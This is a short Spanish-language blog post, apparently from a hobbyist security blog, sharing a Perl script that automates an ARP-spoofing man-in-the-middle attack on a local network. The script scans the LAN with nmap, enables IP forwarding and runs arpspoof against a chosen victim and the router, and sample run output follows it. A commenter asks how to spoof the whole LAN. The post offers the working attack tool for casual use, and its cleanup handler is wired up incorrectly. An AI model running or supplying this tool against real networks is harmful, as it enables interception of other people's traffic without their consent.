Bueno no explicare para que sirve esta herramienta ya que esta bastante tocado el tema, pero es algo que me ahorra bastante tiempo cuando me pongo a jugar realizando Mitm , más la utilizacion de Wireshark
Sé que hay modulos especializados en esto, pero queria hacerlo asi nomas a mano.
Sé que hay modulos especializados en esto, pero queria hacerlo asi nomas a mano.
Lo que haces es:
[+] Buscar ips activas gracias a NMAP
[+]Revisar y cambiar el valor de /proc/sys/net/ipv4/ip_forward para redireccionar el trafico.
[+]Falsear la tabla ARP , una vez detenido el script vuleve los valores a la normalidad.
OJO: Debe ejecutarse como root.
.
#!/usr/bin/perl -W #Coded for @Shinee_ #blog.xshinee.cl #reportes.vulns@hotmail.com #Se debe correr como root ! use strict; system("clear"); my $answer; #variable local &BAN; print "\n\n[+]Buscando ips Activas:\n\n"; system("sudo nmap -sP 192.168.2.0/24 | grep Host "); print "\n[+]Ingresa las ip objetivo: "; chomp(my $ipobj = <STDIN>); print "[+]Ingrese ip del Router: "; chomp(my $iprout = <STDIN>); print"\n\n[+]Revisando el valor de ip_forward: "; system("cat /proc/sys/net/ipv4/ip_forward \n\n"); $answer = qx(cat /proc/sys/net/ipv4/ip_forward\n); if ($answer == 0) { print "[+]Habilitando el Forwarding..\n";system("echo 1 > /proc/sys/net/ipv4/ip_forward") }; print "\n\n[+]Ingresa tu Interface(ej: wlan0 ó eth0 ): "; chomp(my $interface = <STDIN>); print "[+]Comenzando... --> [+]Ctrl + c Para detener ! \n\n"; system("arpspoof -i $interface -t $ipobj $iprout"); $SIG{'INT'} = &Interrupcion ; print "\n[+]Buen dia!\n\n\n"; sub Interrupcion() { print("\n[+]Deshabilitando el Forwarding..\n"); system("echo 0 > /proc/sys/net/ipv4/ip_forward\n"); print("[+]Revisando el valor de ip_forward: "); sleep 1; system("cat /proc/sys/net/ipv4/ip_forward\n\n"); sleep 1; print("[+]Listo !"); } sub BAN(){ print q( [#################################] __ _ _ _ _ __ / _` | '_| '_ \ \__,_|_| | .__/ |_| Arpspoofing t00l ~ Shinee _______\o/__\o/__\o/__\o/_________ [#################################] ); } exit;
En la salida veremos algo como esto:
[#################################] __ _ _ _ _ __ / _` | '_| '_ \ \__,_|_| | .__/ |_| Arpspoofing t00l ~ Shinee _______\o/__\o/__\o/__\o/_________ [#################################] [+]Buscando ips Activas: Host 192.168.2.1 is up (0.0016s latency). Host 192.168.2.2 is up. Host 192.168.2.3 is up (0.051s latency). [+]Ingresa las ip objetivo: 192.168.2.3 [+]Ingrese ip del Router: 192.168.2.1 [+]Revisando el valor de ip_forward: 0 [+]Habilitando el Forwarding.. [+]Ingresa tu Interface(ej: wlan0 ó eth0 ): wlan0 [+]Comenzando... --> [+]Ctrl + c Para detener ! XXXXXXXXX: arp reply 192.168.2.1 is-at XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX: arp reply 192.168.2.1 is-at XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX: arp reply 192.168.2.1 is-at XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX: arp reply 192.168.2.1 is-at XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX: arp reply 192.168.2.1 is-at XXXXXXXXXXXXXXXXXXXXXXXX [+]Deshabilitando el Forwarding.. [+]Revisando el valor de ip_forward: 0 [+]Listo ! [+]Buen dia!
Saludos.
1 comentario:
Shinee_ excelente !, una consulta, es posible arpear la LAN completa (?) un saludo, @li70v.
Publicar un comentario